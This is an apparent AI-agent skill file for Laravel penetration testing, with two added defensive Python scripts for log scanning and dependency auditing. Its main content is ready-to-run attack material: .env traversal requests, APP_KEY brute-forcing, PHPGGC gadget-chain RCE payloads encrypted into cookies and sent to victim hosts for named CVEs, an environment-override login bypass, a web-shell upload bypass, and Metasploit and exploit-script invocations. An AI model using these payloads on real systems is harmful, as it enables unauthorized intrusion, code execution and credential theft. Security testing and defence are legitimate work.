Hacktricks-skills laravel-pentest

Laravel application security testing and exploitation. Use this skill whenever the user mentions Laravel, PHP web application pentesting, APP_KEY exploitation, cookie decryption, deserialization attacks, or any Laravel-specific vulnerability research. This skill covers APP_KEY brute-forcing, cookie forgery, RCE via gadget chains, file upload bypasses, and environment override attacks.

Install

Source: clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/network-services-pentesting/pentesting-web/laravel/SKILL.MD

Source content

Laravel Pentesting Skill

A comprehensive skill for testing Laravel applications for security vulnerabilities, including encryption weaknesses, deserialization attacks, and framework-specific CVEs.

When to Use This Skill

Use this skill when:

  • Testing a Laravel web application for security vulnerabilities
  • You need to decrypt/forge Laravel cookies or sessions
  • Investigating APP_KEY-related vulnerabilities
  • Exploiting Laravel deserialization vulnerabilities (CVE-2018-15133, CVE-2021-3129)
  • Testing for file upload validation bypasses (CVE-2025-27515)
  • Checking for environment override vulnerabilities (CVE-2024-52301)
  • Fingerprinting Laravel applications and exposed debug endpoints

Quick Start

1. Fingerprint the Target

First, confirm the target is running Laravel and identify exposed debug endpoints:

# Use the bundled fingerprinting script
./scripts/laravel_fingerprint.sh https://target.com

# Or manually check common endpoints
for p in _ignition/health-check _debugbar telescope horizon; do 
  curl -sk https://target/$p | head -n1
done

Look for:

  • XSRF-TOKEN and laravel_session cookies
  • Blade error pages
  • Debug tooling endpoints
  • X-Powered-By headers

2. Check for Debug Mode

Debug mode exposes sensitive information and enables additional attack vectors:

# Check for debug banners or verbose errors
curl -sk https://target/

# Force an error to see if debug page appears
curl -sk "https://target/nonexistent-route-xyz123"

If debug mode is enabled, you may see:

  • Stack traces with file paths
  • Environment variables
  • Database credentials
  • Reflected XSS in Whoops error pages (CVE-2024-13918/13919)

3. Extract APP_KEY

The APP_KEY is critical for most Laravel attacks. Try these methods:

Method A: Debug Page Disclosure
If debug mode is on, the APP_KEY may be visible in error pages or stack traces.

Method B: .env File Access
Try path traversal to access .env:

curl -sk "https://target/../../../.env"
curl -sk "https://target/.env"

Method C: Brute-Force from Cookies
If you have encrypted cookies, use the bundled script or laravel-crypto-killer:

# Decrypt a captured cookie
python scripts/laravel_cookie_crypto.py decrypt -k <APP_KEY> -v <cookie_value>

# Brute-force with a wordlist
python scripts/laravel_cookie_crypto.py bruteforce -v <cookie_value> -kf appkeys.txt

APP_KEY Exploitation

Once you have the APP_KEY, you can forge cookies and sessions.

Decrypt/Encrypt Cookies

# Decrypt a cookie
python scripts/laravel_cookie_crypto.py decrypt -k "<APP_KEY>" -v "<cookie_value>"

# Encrypt custom data
python scripts/laravel_cookie_crypto.py encrypt -k "<APP_KEY>" -d '{"username":"admin","role":"superuser"}'

Generate RCE Payloads

Use PHPGGC gadget chains with the APP_KEY:

# Generate RCE payload for Laravel/RCE13
phpggc Laravel/RCE13 "system('id')" -b -f | \
  python scripts/laravel_cookie_crypto.py encrypt -k "<APP_KEY>" -v -

# For Laravel/RCE9 (older versions)
phpggc Laravel/RCE9 "system('id')" -b | \
  python scripts/laravel_cookie_crypto.py encrypt -k "<APP_KEY>" -v -

Real-World Exploitation Patterns

Invoice Ninja ≤v5 (CVE-2024-55555)

phpggc Laravel/RCE13 "system('id')" -b -f | \
  python scripts/laravel_cookie_crypto.py encrypt -k "<APP_KEY>" -v - | \
  xargs -I% curl "https://victim/route/%"

Snipe-IT ≤v6 (CVE-2024-48987)

phpggc Laravel/RCE9 "system('id')" -b | \
  python scripts/laravel_cookie_crypto.py encrypt -k "<APP_KEY>" -v - > xsrf.txt
curl -H "Cookie: XSRF-TOKEN=$(cat xsrf.txt)" https://victim/login

Crater (CVE-2024-55556)

phpggc Laravel/RCE15 "system('id')" -b > payload.bin
python scripts/laravel_cookie_crypto.py encrypt -k "<APP_KEY>" -v payload.bin --session_cookie=<orig_hash> > forged.txt
curl -H "Cookie: laravel_session=<orig>; <cookie_name>=$(cat forged.txt)" https://victim/login

CVE-2024-52301: Environment Override

When PHP's register_argc_argv=On, you can override the Laravel environment per-request:

# Check if override works
curl -sk "https://target/?--env=local"

# Bypass authentication if app trusts environment
POST /login?--env=preprod HTTP/1.1
Host: target
Content-Type: application/x-www-form-urlencoded

email=a@b.c&password=whatever&remember=0xdf

This works when:

  • register_argc_argv=On in PHP configuration
  • Application has environment-gated logic (e.g., if (app()->environment('preprod')))
  • Vulnerable Laravel version that reads argv for HTTP requests
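As an added detection example (not part of the skill or its bundled scripts), the following Python flags, in web-server access logs, the activity described in the fingerprinting, debug-mode and APP_KEY sections and the --env query override from CVE-2024-52301: probes of the debug endpoints, .env and traversal requests, and CLI-flag-shaped query keys. The log lines and the combined log format are constructed assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample lines in combined log format (not captured traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2025:10:00:01 +0000] "GET /_ignition/health-check HTTP/1.1" 200 45 "-" "curl/8.4.0"
10.0.0.5 - - [01/Jan/2025:10:00:02 +0000] "GET /.env HTTP/1.1" 404 0 "-" "curl/8.4.0"
10.0.0.5 - - [01/Jan/2025:10:00:03 +0000] "GET /../../../.env HTTP/1.1" 400 0 "-" "curl/8.4.0"
10.0.0.5 - - [01/Jan/2025:10:00:04 +0000] "POST /login?--env=preprod HTTP/1.1" 302 0 "-" "curl/8.4.0"
10.0.0.9 - - [01/Jan/2025:10:00:06 +0000] "GET /telescope/requests HTTP/1.1" 403 0 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Debug/tooling endpoints the skill fingerprints; hits on them in production deserve an alert.
DEBUG_ENDPOINTS = ("/_ignition/health-check", "/_debugbar", "/telescope", "/horizon")

def classify(target: str) -> list[str]:
    """Return the indicator labels that apply to one request target (path + query)."""
    parts = urlsplit(target)
    path = unquote(parts.path)
    keys = [unquote(k) for k, _ in parse_qsl(parts.query, keep_blank_values=True)]
    hits = []
    if any(path == ep or path.startswith(ep + "/") for ep in DEBUG_ENDPOINTS):
        hits.append("debug-endpoint-probe")
    if path.endswith("/.env"):
        hits.append("env-file-access")
    if "../" in path:
        hits.append("path-traversal")
    # CVE-2024-52301: query keys shaped like CLI flags (--env=...) have no legitimate HTTP use.
    if any(k.startswith("--") for k in keys):
        hits.append("argv-env-override")
    return hits

def scan(log_text: str) -> list[dict]:
    """Parse each log line and return the flagged requests with their indicators."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m and (hits := classify(m["target"])):
            findings.append({"ip": m["ip"], "status": int(m["status"]),
                             "target": m["target"], "hits": hits})
    return findings

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['ip']:<10} {f['status']} {f['target']:<32} {', '.join(f['hits'])}")
```

Feed scan() a real access log to get the same per-request labels; a 200 on a debug endpoint from outside the office range is the finding that matters most.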

CVE-2025-27515: File Upload Bypass

Laravel 10.0–10.48.28, 11.0.0–11.44.0, 12.0.0–12.1.0 have a wildcard validation bypass in file rules (files.*):

# Bypass file validation with crafted field names
curl -sk https://target/upload \
  -F 'files[0]=@ok.png;type=image/png' \
  -F 'files[0][__asterisk__payload]=@shell.php;type=text/plain' \
  -F 'description=lorem'

# Try variations
-F 'files[0][0]=@shell.php;type=text/plain'
-F 'files.__dot__0=@shell.php;type=text/plain'
-F 'files[0][uuid]=@shell.php;type=text/plain'

Detection:

# Static analysis
rg -n "files\\.\\*" -g"*.php" app/

# Check FormRequest classes for rules() with files.*

Ecosystem Package Vulnerabilities

CVE-2025-47275: Auth0-PHP CookieStore

Affects auth0/auth0-php < 8.14.0:

# Check if vulnerable
grep "auth0/auth0-php" composer.lock
grep "AUTH0_SESSION_STORAGE=cookie" .env

# If vulnerable, brute-force the GCM tag on auth0 cookie
# Modify JSON payload (sub, roles) and replay

CVE-2025-48490: lomkit/laravel-rest-api

Affects lomkit/laravel-rest-api < 2.13.0:

# Check version
grep "lomkit/laravel-rest-api" composer.lock

# Test filter bypass
/_rest/users?filters[0][column]=password&filters[0][operator]==
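As an added audit example (not part of the skill or its bundled scripts) covering the affected versions listed above for CVE-2025-27515 and for the auth0-php and laravel-rest-api packages, the following Python reads a composer.lock and a .env and reports installed versions inside those ranges plus the APP_DEBUG and AUTH0_SESSION_STORAGE settings the text calls out. The composer.lock excerpt and .env contents are constructed.

```python
import json
import re

# Constructed composer.lock excerpt and .env contents (not from any real deployment).
COMPOSER_LOCK = json.dumps({"packages": [
    {"name": "laravel/framework", "version": "v11.43.0"},
    {"name": "auth0/auth0-php", "version": "8.13.2"},
    {"name": "lomkit/laravel-rest-api", "version": "v2.13.0"},
]})
DOTENV = "APP_ENV=production\nAPP_DEBUG=true\nAPP_KEY=base64:PLACEHOLDER_NOT_A_REAL_KEY\nAUTH0_SESSION_STORAGE=cookie\n"

# Affected ranges as stated in the text: (low inclusive, high, high inclusive?).
AFFECTED = {
    "laravel/framework": ("CVE-2025-27515",
        [("10.0.0", "10.48.28", True), ("11.0.0", "11.44.0", True), ("12.0.0", "12.1.0", True)]),
    "auth0/auth0-php": ("CVE-2025-47275", [("0.0.0", "8.14.0", False)]),
    "lomkit/laravel-rest-api": ("CVE-2025-48490", [("0.0.0", "2.13.0", False)]),
}

def vtuple(v: str) -> tuple:
    """Turn 'v11.43.0', '8.13.2' or '2.13' into a 3-int tuple; pre-release/build suffixes dropped."""
    nums = [int(n) for n in re.findall(r"\d+", re.split(r"[-+]", v, maxsplit=1)[0])][:3]
    return tuple(nums + [0] * (3 - len(nums)))

def in_range(version: str, low: str, high: str, high_inclusive: bool) -> bool:
    v = vtuple(version)
    return vtuple(low) <= v and (v <= vtuple(high) if high_inclusive else v < vtuple(high))

def audit_lock(lock_json: str) -> list:
    """Return (package, installed version, CVE) for each locked package inside an affected range."""
    data = json.loads(lock_json)
    findings = []
    for pkg in data.get("packages", []) + data.get("packages-dev", []):
        entry = AFFECTED.get(pkg["name"])
        if entry and any(in_range(pkg["version"], *r) for r in entry[1]):
            findings.append((pkg["name"], pkg["version"], entry[0]))
    return findings

def audit_env(dotenv: str) -> list:
    """Flag the .env settings the text calls out: debug mode on, Auth0 cookie session storage."""
    kv = dict(l.strip().split("=", 1) for l in dotenv.splitlines() if "=" in l and not l.startswith("#"))
    issues = []
    if kv.get("APP_DEBUG", "false").lower() == "true":
        issues.append("APP_DEBUG=true: verbose errors, env vars and Ignition pages exposed")
    if kv.get("AUTH0_SESSION_STORAGE") == "cookie":
        issues.append("AUTH0_SESSION_STORAGE=cookie: auth0-php cookie store in use, check its version")
    return issues
```

Run audit_lock(open("composer.lock").read()) and audit_env(open(".env").read()) in a checkout; register_argc_argv is not in either file and has to be read from the PHP configuration (php -i).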

Legacy Deserialization Attacks

CVE-2018-15133 (Laravel 5.5.40, 5.6.x–5.6.29)

# Using laravel-poc-CVE-2018-15133
git clone https://github.com/kozmic/laravel-poc-CVE-2018-15133
cd laravel-poc-CVE-2018-15133
python3 exploit.py <target> <command>

# Using Metasploit
use unix/http/laravel_token_unserialize_exec
set RHOSTS <target>
set LHOST <your_ip>
exploit

CVE-2021-3129 (Laravel Debug Mode)

# Using ambionics/laravel-exploits
git clone https://github.com/ambionics/laravel-exploits
cd laravel-exploits
python3 exploit.py <target> <command>

Workflow Summary

  1. Fingerprint - Confirm Laravel, check debug endpoints
  2. Extract APP_KEY - Debug page, .env, or brute-force
  3. Choose Attack Vector:
    • Cookie forgery with APP_KEY
    • Deserialization RCE (version-dependent)
    • File upload bypass (CVE-2025-27515)
    • Environment override (CVE-2024-52301)
  4. Generate Payload - Use PHPGGC + encryption
  5. Deliver - Inject into vulnerable sink (cookie, route param, session)
  6. Verify - Check for command execution or privilege escalation

Tools Required

  • phpggc - PHP Generic Gadget Chains
  • laravel-crypto-killer - Cookie encryption/decryption (bundled script provides similar functionality)
  • curl - HTTP requests
  • python3 - For bundled scripts

References